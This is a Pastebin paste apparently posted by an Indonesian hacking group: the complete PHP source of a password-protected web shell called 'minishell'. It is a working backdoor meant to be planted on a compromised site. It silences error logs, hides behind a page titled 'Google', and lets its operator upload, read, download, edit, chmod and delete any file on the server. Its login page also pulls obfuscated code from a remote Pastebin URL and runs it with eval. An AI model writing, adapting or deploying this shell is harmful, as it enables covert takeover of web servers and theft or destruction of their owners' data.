SHARE
TWEET

minishell

BogorCyberSec Aug 14th, 2019 (edited) 89 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. @session_start();
  3. @error_reporting(0);
  4. @error_log(0);
  5. @ini_set('error_log',NULL);
  6. @ini_set('log_errors',0);
  7. @ini_set('max_execution_time',0);
  8. @ini_set('output_buffering',0);
  9. @ini_set('display_errors', 0);
  10. @set_time_limit(0);
  11. $lol="a7a189951821c2ebf7bf3167ec3f9fbe";
  12. function printLogin() {
  13.     ?>
  14. <html>
  15. <head>
  16. <title>Login</title>
  17. <meta name='author' content='rare'>
  18. <meta charset="UTF-8">
  19. <style type='text/css'>
  20. @import url(https://fonts.googleapis.com/css?family=Mirza);
  21. html {
  22.     background: #000000;
  23.     color: #ffffff;
  24.     font-family: 'Mirza';
  25.     font-size: 13px;
  26.     width: 100%;
  27. }
  28. input[type=text], input[type=password],input[type=submit] {
  29.     background: transparent;
  30.     color: #ffffff;
  31.     text-align: center;
  32.     border: 1px solid red;
  33.     margin: 5px auto;
  34.     padding-left: 5px;
  35.     font-family: 'Mirza';
  36.     font-size: 13px;
  37. }
  38. </style>
  39. <style type="text/css">
  40. .pulseit{display:inline-block;-webkit-animation:pound .4s infinite;animation:pound .4s infinite;}
  41. @keyframes pound {from {transform:none;}50% {transform:scale(1.3);}to
  42. {transform:none;}}
  43. </style>
  44. </head>
  45.     <style>
  46.         input { margin:0;background-color:#fff;border:0px solid #fff; }
  47.     </style>
  48.     <center><br><br><br><br><br><br><br><br> <img src=https://newbiesecode.github.io/newbiesecode.png class=pulseit width=220px></img></center><center><br><br>
  49.     <form method=post>
  50.     <input type=password name=BogorCyberSec>
  51.     </form></center>
  52.     <?php
  53.     eval(gzinflate(base64_decode(file_get_contents('http://pastebin.com/raw/6PJ9Pj8F'))));
  54.     exit;
  55. }
  56. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  57.     if( empty( $lol ) ||
  58.         ( isset( $_POST['BogorCyberSec'] ) && ( md5($_POST['BogorCyberSec']) == $lol ) ) )
  59.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  60.     else
  61.         printLogin();
  62. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  63.     @ob_clean();
  64.     $file = $_GET['file'];
  65.     header('Content-Description: File Transfer');
  66.     header('Content-Type: application/octet-stream');
  67.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  68.     header('Expires: 0');
  69.     header('Cache-Control: must-revalidate');
  70.     header('Pragma: public');
  71.     header('Content-Length: ' . filesize($file));
  72.     readfile($file);
  73.     exit;
  74. }  
  75.    
  76. ?>
  77. <html>
  78. <head>
  79. <title>Google</title>
  80. </head>
  81.  
  82. <style>
  83. @font-face {
  84.   font-family: 'Comic Sans MS';
  85.   font-style: normal;
  86.   font-weight: 400;
  87.   src: local('Comic Sans MS'), local('ComicSansMS'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format('truetype');
  88. }
  89. body {
  90.    
  91.   background:    #000000;line-height: 1;color: #fff;font-family: Comic Sans MS ;
  92.  
  93.   }
  94.  
  95. table, th, td {
  96.     border-collapse:collapse;
  97.     background: transparent;
  98.     font-family: Comic Sans MS ;
  99.     font-size: 13px;
  100. }
  101. input, textarea { font-family: Comic Sans MS ; }
  102. .table_home, .th_home, .td_home { color:grey;
  103.     border: 1px solid grey;
  104. }
  105. th {
  106.     padding: 10px;
  107. }
  108. .td_home { padding: 7px; }
  109. select {font-family: Comic Sans MS }
  110. a {color:white}
  111. textarea { width: 100%;height: 400px; }
  112. </style>
  113. <?php
  114.  
  115. echo '</head>
  116. <body><b>
  117. <H1><center> &lt;/&gt; <font color="red">BOGOR CYBERSEC</font> <font color="dodgerblue">SHELL PRIV8</font> &lt;/&gt; </center></h1>
  118. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  119.  
  120. <tr><td>
  121.  
  122. <font color="green"><center>'.php_uname().'</center></font><br>';
  123. if(isset($_GET['path'])){
  124. $path = $_GET['path'];
  125. }else{
  126. $path =
  127.  
  128.  
  129. getcwd();
  130.  
  131. }
  132. $path = str_replace('\\','/',$path);
  133. $paths = explode('/',$path);
  134.  
  135. foreach($paths as $id=>$pat){
  136. if($pat == '' && $id == 0){
  137. $a = true;
  138. echo '<font color=#fff><center>root@R4nsomheR3:~# <a href="?path=/">/</a>';
  139. continue;
  140. }
  141. if($pat == '') continue;
  142. echo '<a href="?path=';
  143. for($i=0;$i<=$id;$i++){
  144. echo "$paths[$i]";
  145. if($i != $id) echo "/";
  146. }
  147. echo '">'.$pat.'</a>/';
  148. }
  149. echo '</font></center></td></tr><tr><td><center>';
  150. if(isset($_FILES['file'])){
  151. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  152. echo '<font color="green">File Uploaded</font><br />';
  153. }else{
  154. echo '<font color="red">Upload Gagal !!</font><br />';
  155. }
  156. }
  157. echo '</center><center><form enctype="multipart/form-data" method="POST"><font color="black"><input style="background:silver;font-family: Comic Sans MS " type="file" name="file" />
  158. <input type="submit" value="Upload" />
  159. </form></center>
  160. </td></tr>';
  161. if(isset($_GET['filesrc'])){
  162. echo "<tr><td><center>Current File : ";
  163. echo $_GET['filesrc'];
  164. echo '</center></tr></td></table><br />';
  165. echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  166. }
  167. //Empety
  168. elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){
  169. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  170. //Chmod
  171. if($_GET['opt'] == 'chmod'){
  172. if(isset($_POST['perm'])){
  173. if(chmod($_POST['path'],$_POST['perm'])){
  174. echo '<font color="green">Ganti Permission Sukses </font><br />';
  175. }else{
  176. echo '<font color="red">Ganti Permission Gagal </font><br />';
  177. }
  178. }
  179.  
  180. $hell = $_GET['path'];
  181. $yeah = $_GET['name'];
  182. $patc = "$hell/$yeah";
  183.  
  184. echo '<form method="POST">
  185. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />
  186. <input type="hidden" name="path" value="'.$_POST['path'].'">
  187. <input type="hidden" name="opt" value="chmod">
  188. <input type="submit" value="Go" />
  189. </form>';
  190. }
  191. //
  192. elseif($_GET['opt'] == 'btw'){
  193.     $cwd = getcwd();
  194.      echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
  195. New Name : <input name="name" type="text" size="20" value="Folder" />
  196. <input type="hidden" name="path" value="'.$cwd.'">
  197. <input type="hidden" name="opt" value="delete">
  198. <input type="submit" value="Go" />
  199. </form>';
  200. }
  201. //Rename file
  202. elseif($_GET['opt'] == 'rename'){
  203. if(isset($_POST['newname'])){
  204. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  205. echo '<font color="green">Sukses Change Name</font><br />';
  206. }else{
  207. echo '<font color="red">Change Name Gagal</font><br />';
  208. }
  209. $_POST['name'] = $_POST['newname'];
  210. }
  211. $hell = $_GET['path'];
  212. $yeah = $_GET['name'];
  213. $patc = "$hell/$yeah";
  214. $new = $_POST['newname'];
  215.  
  216. echo '<form method="POST">
  217. New Name : <input name="newname" type="text" size="20" value="'.$new.'" />
  218. <input type="hidden" name="path" value="'.$patc.'">
  219. <input type="hidden" name="opt" value="rename">
  220. <input type="submit" value="Go" />
  221. </form>';
  222. }
  223. //File baru
  224. elseif($_GET['opt'] == 'baru'){
  225.    
  226. $hell = $_GET['path'];
  227. $yeah = $_GET['name'];
  228. $patc = "$hell/$yeah";
  229. $new = $_POST['newname'];
  230. $azz = $_POST['path'];
  231. $newz = "$azz/$new";
  232.  
  233.  
  234. if(isset($_POST['src'])){
  235. $fp = fopen($_POST['path'],'w');
  236. if(fwrite($fp,$_POST['src'])){
  237. echo '<font color="green">Berhasil Membuat File [ '.$new.' ]</font><br />';
  238. }else{
  239. echo '<font color="red">Membuat File Gagal</font><br />';
  240. }
  241. fclose($fp);
  242. }
  243.  
  244. echo '<form method="POST"> Name : <input name="ngaran1" type="text" size="20" value="'.$new.'" /><input type="submit" name="ngaran" value="Create"/></form><br> ';
  245.  
  246. $ho = $_POST['ngaran1'];
  247.  
  248. if(isset($_POST['ngaran'])){
  249. echo '<form method="POST">
  250. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  251. <input type="hidden" name="path" value="'.$hell.'/'.$ho.'">
  252. <input type="hidden" name="opt" value="edit">
  253. <input type="submit" value="Go" />
  254. </form>';
  255.     }
  256.     }
  257. //Edited file
  258. elseif($_GET['opt'] == 'edit'){
  259. if(isset($_POST['src'])){
  260. $fp = fopen($_POST['path'],'w');
  261. if(fwrite($fp,$_POST['src'])){
  262. echo '<font color="green">Edit File Berhasil</font><br />';
  263. }else{
  264. echo '<font color="red">Edit File Gagal</font><br />';
  265. }
  266. fclose($fp);
  267. }
  268. $hell = $_GET['path'];
  269. $yeah = $_GET['name'];
  270. $patc = "$hell/$yeah";
  271. echo '<form method="POST">
  272. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  273. <input type="hidden" name="path" value="'.$patc.'">
  274. <input type="hidden" name="opt" value="edit">
  275. <input type="submit" value="Go" />
  276. </form>';
  277. }
  278. echo '</center>';
  279. }else{
  280. echo '</table><br /><center>';
  281. //Delete dir and file
  282. if(isset($_GET['option']) && $_GET['opt'] == 'delete'){
  283.    
  284. $hell = $_GET['path'];
  285. $yeah = $_GET['name'];
  286. $patc = "$hell/$yeah";
  287.  
  288. //Delete dir
  289. if($_GET['type'] == 'dir'){
  290.  
  291. if(rmdir($patc)){
  292. echo '<font color="green">Berhasil Hapus File</font><br />';
  293. }else{
  294. echo '<font color="red">Hapus File Gagal</font><br />';
  295. }
  296. }
  297. //buat folder
  298. if($_GET['type'] == 'buat'){
  299. $haaa = $_POST['path'];
  300. $heee = $_POST['name'];
  301. $hooo = "$haaa/$heee";
  302. $new = $haaa.'/'.htmlspecialchars($heee);
  303. if(!mkdir($new)){
  304. echo '<font color="red">Gagal Membuat Folder</font><br />';
  305. }else{
  306. echo '<font color="green">Berhasil Membuat Folder</font><br />';
  307. }
  308. }
  309. //Delete file
  310. elseif($_GET['type'] == 'file'){
  311.  
  312. $hell = $_GET['path'];
  313. $yeah = $_GET['name'];
  314. $patc = "$hell/$yeah";
  315.  
  316. if(unlink($patc)){
  317. echo '<font color="green">Hapus File Sukses</font><br />';
  318. }else{
  319. echo '<font color="red#">Hapus File Gagal</font><br />';
  320. }
  321. }
  322. }
  323. echo '</center>';
  324. $scandir = scandir($path);
  325. $pa = getcwd();
  326. echo ' <table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  327. <tr>
  328. <th class=th_home style="background:silver;color:black;"><center>Name</center></th>
  329. <th class=th_home style="background:silver;color:black;" ><center>Size</center></th>
  330. <th class=th_home style="background:silver;color:black;" ><center>Perm</center></th>
  331. <th class=th_home style="background:silver;color:black;" ><center>Options</center></th>
  332. </tr> <tr>
  333. <td class=td_home>..</td><td class=td_home align=center>NONE</td> <td class=td_home align=center>LINK</td> <td class=td_home align=center> <a href="?option&path='.$pa.'&opt=baru&name=new">+ New File</a> | <a href="?option&path='.$pa.'&opt=btw&type=dir">+ New Folder</a> </td></tr>
  334. ';
  335.  
  336. foreach($scandir as $dir){
  337. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  338. echo "
  339. <tr>
  340. <td class=td_home> <img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a href=\"?path=$path/$dir\">$dir</a></td>
  341. <td class=td_home ><center>DIR</center></td>
  342. <td class=td_home ><center>";
  343. if(is_writable("$path/$dir")) echo '<font color="green">';
  344. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  345. echo perms("$path/$dir");
  346. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  347.  
  348. echo "</center></td>
  349. <td class=td_home ><center>
  350. <a href=\"?option&path=$path&opt=rename&type=dir&name=$dir\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=dir&name=$dir\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=dir&name=$dir\">Chmod</a>
  351.  
  352. </center></td>
  353. </tr>";
  354. }
  355. echo '<br>';
  356. foreach($scandir as $file){
  357. if(!is_file("$path/$file")) continue;
  358. $size = filesize("$path/$file")/1024;
  359. $size = round($size,3);
  360. if($size >= 1024){
  361. $size = round($size/1024,2).' MB';
  362. }else{
  363. $size = $size.' KB';
  364. }
  365.  
  366. echo "<tr>
  367. <td class=td_home > <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='> <a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  368. <td class=td_home><center>".$size."</center></td>
  369. <td class=td_home><center>";
  370. if(is_writable("$path/$file")) echo '<font color="green">';
  371. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  372. echo perms("$path/$file");
  373. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  374. echo "</center></td>
  375. <td class=td_home><center>
  376. <a href=\"?option&path=$path&opt=edit&type=file&name=$file\">Edit</a> <a href=\"?option&path=$path&opt=rename&type=file&name=$file&path=$path\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=file&name=$file\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=file&name=$file\">Chmod</a>
  377. </center></td>
  378. </tr>";
  379. }
  380. echo '</table>
  381. </div>';
  382. }
  383. echo '<br><center>{ BOGOR CYBERSEC - CYBER ARMY INDONESIA - INDOXPLOIT CODERS - B4CKD00R-CR45H }<br>[STAY CLOSE AND KEEP SILENT!]</body>
  384. </html>';
  385. function perms($file){
  386. $perms = fileperms($file);
  387.  
  388. if (($perms & 0xC000) == 0xC000) {
  389. // Socket
  390. $info = 's';
  391. } elseif (($perms & 0xA000) == 0xA000) {
  392. // Symbolic Link
  393. $info = 'l';
  394. } elseif (($perms & 0x8000) == 0x8000) {
  395. // Regular
  396. $info = '-';
  397. } elseif (($perms & 0x6000) == 0x6000) {
  398. // Block special
  399. $info = 'b';
  400. } elseif (($perms & 0x4000) == 0x4000) {
  401. // Directory
  402. $info = 'd';
  403. } elseif (($perms & 0x2000) == 0x2000) {
  404. // Character special
  405. $info = 'c';
  406. } elseif (($perms & 0x1000) == 0x1000) {
  407. // FIFO pipe
  408. $info = 'p';
  409. } else {
  410. // Unknown
  411. $info = 'u';
  412. }
  413.  
  414. // Owner
  415. $info .= (($perms & 0x0100) ? 'r' : '-');
  416. $info .= (($perms & 0x0080) ? 'w' : '-');
  417. $info .= (($perms & 0x0040) ?
  418. (($perms & 0x0800) ? 's' : 'x' ) :
  419. (($perms & 0x0800) ? 'S' : '-'));
  420.  
  421. // Group
  422. $info .= (($perms & 0x0020) ? 'r' : '-');
  423. $info .= (($perms & 0x0010) ? 'w' : '-');
  424. $info .= (($perms & 0x0008) ?
  425. (($perms & 0x0400) ? 's' : 'x' ) :
  426. (($perms & 0x0400) ? 'S' : '-'));
  427.  
  428. // World
  429. $info .= (($perms & 0x0004) ? 'r' : '-');
  430. $info .= (($perms & 0x0002) ? 'w' : '-');
  431. $info .= (($perms & 0x0001) ?
  432. (($perms & 0x0200) ? 't' : 'x' ) :
  433. (($perms & 0x0200) ? 'T' : '-'));
  434.  
  435. return $info;
  436. }
  437.  
  438. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top